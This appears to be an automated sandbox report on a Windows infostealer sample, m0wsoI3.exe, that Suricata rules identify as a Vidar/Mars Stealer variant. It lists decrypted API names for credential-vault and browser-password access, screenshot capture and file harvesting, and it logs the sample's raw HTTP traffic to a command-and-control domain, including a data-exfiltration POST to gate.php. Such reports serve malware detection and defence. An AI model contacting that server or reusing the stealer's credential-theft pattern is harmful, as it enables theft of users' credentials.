Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CopyFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcmpW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcmpW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: UnmapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: UnmapViewOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FileTimeToSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FileTimeToSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileInformationByHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileInformationByHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVersionExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetVersionExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileMappingW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateThread
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateThread
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpQueryInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HttpQueryInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetSetOptionA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetSetOptionA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wsprintfA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wsprintfA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CharToOemW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CharToOemW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemMetrics
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemMetrics
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetWindowDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseWindow
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentHwProfileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentHwProfileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegGetValueA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RegGetValueA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SelectObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SelectObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BitBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BitBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteObject
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StretchBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StretchBlt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetObjectW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetObjectW
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDIBits
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetDIBits
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SaveDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SaveDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDIBSection
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateDIBSection
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DeleteDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RestoreDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: RestoreDC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DsRoleGetPrimaryDomainInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: DsRoleGetPrimaryDomainInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultOpenVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultOpenVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultCloseVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultCloseVault
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultEnumerateItems
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultEnumerateItems
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin8
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin8
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin7
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultGetItemWin7
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VaultFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrStrA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: StrStrA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00408E30
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA, 0_2_00405450
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_004090C0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408AB0 CryptUnprotectData, 0_2_00408AB0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00408D90

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\m0wsoI3.exe Unpacked PE file: 0.2.m0wsoI3.exe.60900000.1.unpack
Uses 32bit PE files
Source: m0wsoI3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: m0wsoI3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2022818 - Severity 1 - ET MALWARE Generic gate .php GET with minimal headers : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2035884 - Severity 1 - ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4 : 188.114.97.3:80 -> 192.168.2.6:49693
Source: Network traffic Suricata IDS: 2036654 - Severity 1 - ET MALWARE Win32/Vidar Variant/Mars Stealer Resources Download : 188.114.97.3:80 -> 192.168.2.6:49693
Source: Network traffic Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.6:49693 -> 188.114.97.3:80
Source: Network traffic Suricata IDS: 2033163 - Severity 1 - ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil : 192.168.2.6:49693 -> 188.114.97.3:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: ctrlgem.xyz/gate.php
Performs DNS queries to domains with low reputation
Source: DNS query: ctrlgem.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gate.php HTTP/1.1Host: ctrlgem.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /request HTTP/1.1Host: ctrlgem.xyzCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: global traffic HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1Host: ctrlgem.xyzContent-Length: 93766Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 12:22:11 GMTContent-Length: 1565849Connection: keep-aliveLast-Modified: Mon, 21 Feb 2022 23:34:00 GMTAccept-Ranges: bytescf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVm1w7ydFyweCFchTxOdOGkd5n3m5BqZPfpwO0lSXEklBICOkCzctCPZvcqino7sfa6%2FEHPK4ouxaWt7GCxbOH%2FFbj6Lybh844BrAJjQUzoQlkx7HcBACg6IArACng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 921c74547fa60f89-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1656&rtt_var=648&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1198&recv_bytes=215&delivery_rate=1655328&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkMHWD<{.6.Xtw+E][Oax}{'n.&m70eflp50p5{t'Ieoe_[q)1L%g0mZfkos,q(>`
Source: global traffic HTTP traffic detected: GET /gate.php HTTP/1.1Host: ctrlgem.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /request HTTP/1.1Host: ctrlgem.xyzCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: global traffic DNS traffic detected: DNS query: ctrlgem.xyz
Source: unknown HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1Host: ctrlgem.xyzContent-Length: 93766Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=291d239f3940517dbefb215d3b920d7e
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
